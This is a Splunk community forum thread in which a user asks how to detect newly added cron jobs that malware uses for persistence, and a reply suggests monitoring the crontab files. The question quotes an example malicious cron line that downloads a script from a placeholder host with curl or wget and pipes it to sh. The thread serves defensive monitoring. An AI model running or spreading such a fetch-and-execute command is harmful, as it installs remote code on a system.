Splunk Enterprise
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Ask a Question

how to use splunk monitor a cron job add action

bestSplunker
Contributor
‎08-06-2020 07:03 PM

when some Trojans or virus  are implanted in the Linux OS. it will add cron job to  persist the Trojans .

for example:

 

 

 

 

curl -fsSL https://xxxx.com/raw/sByq0rym ||wget -q -0- https://xxx.com/raw/sByq0rym)|sh

 

 

 

 

so, can I use splunk to monitor  newly added  cron job ?

Labels (1)
Labels
0 Karma
Reply

thambisetty
Super Champion
‎08-06-2020 10:25 PM

You can monitor crontab files and apply your logic to find new cron job added.

The below doc is helpful to find out cronjob location 

https://opensource.com/article/17/11/how-use-cron-linux

————————————
If this helps, give a like below.
0 Karma
Reply
Get Updates on the Splunk Community!

Splunk Forwarders and Forced Time Based Load Balancing

Splunk customers use universal forwarders to collect and send data to Splunk. A universal forwarder can send ...

NEW! Log Views in Splunk Observability Dashboards Gives Context From a Single Page

Today, Splunk Observability releases log views, a new feature for users to add their logs data from Splunk Log ...

Last Chance to Submit Your Paper For BSides Splunk - Deadline is August 12th!

Hello everyone! Don't wait to submit - The deadline is August 12th! We have truly missed the community so ...